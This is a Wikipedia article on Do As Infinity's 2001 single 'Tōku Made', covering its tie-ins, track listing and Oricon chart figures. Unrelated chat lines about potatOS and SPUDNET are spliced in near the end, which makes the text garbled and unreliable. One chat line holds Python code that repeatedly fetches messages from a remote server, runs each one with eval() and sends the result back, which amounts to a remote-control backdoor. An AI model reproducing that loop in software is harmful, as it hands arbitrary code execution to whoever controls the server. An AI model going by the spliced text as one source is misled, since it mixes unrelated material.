Tōku Made

"Tōku Made" (遠くまで) is the eighth single by Do As Infinity, released in 2001. "Tōku Made" was the theme song to the anime movie Vampire Hunter D: Bloodlust and was also used during the final episode of the first series of the Japanese TV drama "Waterboys". "Signal" was the theme song to a Lavenus hair care TV commercial which starred the lead vocalist, Tomiko Van.

"Tōku Made"
Single by Do As Infinity
from the album Deep Forest
ReleasedApril 25, 2001
GenreJ-pop
Length16:59
Labelavex trax
Songwriter(s)Dai Nagao
Producer(s)Dai Nagao, Seiji Kameda
Do As Infinity singles chronology
"Desire"
(2001)
"Tōku Made"
(2001)
"Week!"
(2001)

This song was included in the band's compilation albums Do the Best and Do the A-side.

Track listing

  1. "Tōku Made" (遠くまで, Far Away)
  2. "Signal" (シグナル, Shigunaru)
  3. "Tōku Made" (遠くまで, Far Away) (Instrumental)
  4. "Signal" (シグナル, Shigunaru) (Instrumental)

Chart positions

Chart (2001) Peak
position
Sales Time in
chart
Japan Oricon 12 89,600 6 weeks
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.